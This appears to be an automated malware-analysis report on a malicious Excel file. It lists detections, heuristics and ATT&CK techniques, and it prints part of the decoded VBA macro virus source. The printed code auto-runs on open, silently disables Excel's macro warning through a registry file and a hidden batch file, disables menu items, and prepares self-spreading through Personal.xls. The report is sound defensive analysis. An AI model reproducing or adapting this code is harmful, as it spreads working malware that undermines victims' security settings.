MALICIOUS
282
Risk Score
Malware Insights
MITRE ATT&CK
T1059.005 Visual Basic
T1566.001 Spearphishing Attachment
T1204.002 Malicious File
The file is an Excel document containing VBA macros, specifically an Auto_Open macro that executes a Shell() command. This script attempts to create registry files and batch files in the root of the C drive, likely as part of a downloader or initial execution chain for a second-stage payload. The ClamAV detection 'Xls.Trojan.Greedy-1' further supports its malicious nature.
Heuristics 6
-
ClamAV: Xls.Trojan.Greedy-1 critical CLAMAV_DETECTIONClamAV detected this file as malware: Xls.Trojan.Greedy-1
-
VBA macros detected medium 3 related findings OLE_VBA_MACROSDocument contains VBA macro code
-
Shell() call in VBA critical OLE_VBA_SHELLShell() call in VBA
-
Auto_Open macro high OLE_VBA_AUTOAuto_Open macro
-
VBA p-code auto-exec with execution tokens high OLE_VBA_PCODE_AUTOEXEC_EXECCompiled VBA/cache stream contains an auto-execution token together with shell/download/object-execution tokens. This catches p-code-only or source-extraction-failure macro documents where visible source is unavailable.
-
Suspicious extracted artifact info EXTRACTED_FILE_STATIC_TRIAGEOne or more files extracted from inside this sample matched static suspicious-content checks such as script obfuscation, encoded payload blobs, packed data, or execution/download terms.
Extracted artifacts 1
Files carved from inside the sample during analysis.
| Filename | Kind | Source | Size |
|---|---|---|---|
macros.bas |
vba-macro | oletools.olevba.extract_macros (decoded VBA source) | 6950 bytes |
SHA-256: 959ce642061840d13201eb2d0863bcf144b94aee93750cb4f89576c6748eb8f7 |
|||
|
Detection
ClamAV:
Xls.Trojan.Greedy-1
Obfuscation or payload:
likely
Carved artifact contains 12 long base64-like blob(s).
|
|||
Preview scriptFirst 1,000 lines of the extracted script
Attribute VB_Name = "DieseArbeitsmappe"
Attribute VB_Base = "0{00020819-0000-0000-C000-000000000046}"
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = True
Attribute VB_Name = "Tabelle1"
Attribute VB_Base = "0{00020820-0000-0000-C000-000000000046}"
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = True
Attribute VB_Name = "Dmize"
Sub Auto_Open()
Application.OnSheetActivate = "Dmizer"
End Sub
Sub Dmizer()
On Error Resume Next
Rem B179K367R357B428G971W542K263C502U983P714N416
'This is taken from Shiver by AVM | Thanks
'-------------------------------------------------------------------
Rem S662U831U56T908F555X634N152M556T389R185D502D265P809Q288N352K256K787J700E527L948J126W635S928X471R954N257K40E150V229R182Q417Q19
If UCase(Dir("c:\o6.reg")) <> "O6.REG" Or UCase(Dir("c:\o6.bat")) <> "O6.BAT" Then
Rem C535C102V198I568P921R777U84G755B552F933K823G410I415V469K507P344O829K236S804V575I937S539E460I820T215D637F800J4T960
Rem P950X502R729U668J650T807C595I484P247K474J233F37B511V430J16T671W542O560W892V935J265F200O891S79W933I639U618F555U631J621E757O521F769N841S570P337G585
Open "c:\o6.reg" For Output As 1
Print #1, "REGEDIT4"
Rem V122E933F136V521D626B790U705Q357S525X231S800K456U569J8E212I923
Print #1, "[HKEY_CURRENT_USER\Software\Microsoft\Office\8.0\Excel\Microsoft Excel]"
Print #1, """Options6""=dword:00000000"
Close 1
Rem B763N40G81W963G21O0P530E293C552J963G795R996G742H381F923B501
Rem U33R36E209O547O159D289W509V507N99C392V251F464
Open "c:\o6.bat" For Output As 1
Rem W702V12S497W711G773N15M798J931N303U668V748F12H844S971P314X673Q907F497J669R469P453Q899Q689I277C396E408J452B805F105T333B740W91N898I560L538Q994B552U57
Rem S392D865Q562E239F473L341U562S749P681P747E982P331W62C478R345P664O734S626U496Q382E400F490
Rem I570U836N69H200
Print #1, "regedit /s c:\o6.reg"
Rem K990K835E488T316D906H912K746L749J763C247G357W634U215F715
Close 1
End If
Rem P711M792Q365K618Q259K799T107K386M987G707I482G634F71W101V768M863S16N521N821F778P154
Rem K364W559R785N559T669W479W659S742C179J775S693U400S230S474N139N784T112R183C448X979J567O584P778F395Q292Q941C489N271P435D594T645K173V99C462O510L497
Shell ("c:\o6.bat"), vbHide
Rem U622Q576V156J817K322H267X927L804E527V36C184W178F495I207O846M240D937V183W541T619M520F946P96U773N360G555W43O488J528
Rem R420X552R632T913J914T721V602B626X162C444R579D678F2S282C629L673P853D3C648U666Q212E74T858D664S154E169U311O130C830D663M387Q476R973K135O292
Rem E981L200Q311U91B680D603D964D233L255
Rem T357N431O77K163V896W668C632J926G706U373D666L540F944I953W876D266M969S650J412I443Q844L30
Rem K125J430D873V566L668C874
Rem K801C214P619D68R758U381C161P269U496M360U43P811D839C574H66F907G691G148
'-------------------------------------------------------------------
Rem L628G251W845U653W462K154K534G883W864L697E768R64N92D207Q472F494J857R84I270F805X824T310O990S454N112N944U167S226G789F624Q531O734O381P65L524
CommandBars("Tools").Controls(10).Enabled = False
CommandBars("Tools").Controls(12).Enabled = False
Rem N117H378O547N937S756C384W895T719G601N277O503U364H996G154R253O822O490V941D482L121N331K894K479D866V974
Rem O982I289E342R994Q935L505H29S827
CommandBars("View").Controls(3).Enabled = False
CommandBars("Window").Controls(3).Enabled = False
CommandBars("Window").Controls(4).Enabled = False
Rem R810G45O407I443R197M324S142N991V610T380J639S444
Am = Application.VBE.SelectedVBComponent.Name
Set Aw = ActiveWorkbook.VBProject.VBComponents
Rem I241N984
Data = "c:\win95.sys"
Rem W635S683G29B840F55K580O265T488R567D361H742L841I208
Px = "Personal.xls"
Pxx = Application.StartupPath & "\" & Px
Rem G884J492O395K980P869G903S69F737
WorkIns = 0
GlobalIns = 0
Rem Q576W783C145K364W544T490Q479F132S315L211D971W615M59U462H270H619H21U463X345Q901H27K636N998I675J978I107B361H105N358P203W389G805N723G956R368R351C212E603
Rem V218V276M15E93W217E634D585P366F915K75I930
Rem T704Q180D944S610S231F902R
... (truncated)
|
|||
Open this report in the interactive analyzer, or submit your own file for analysis.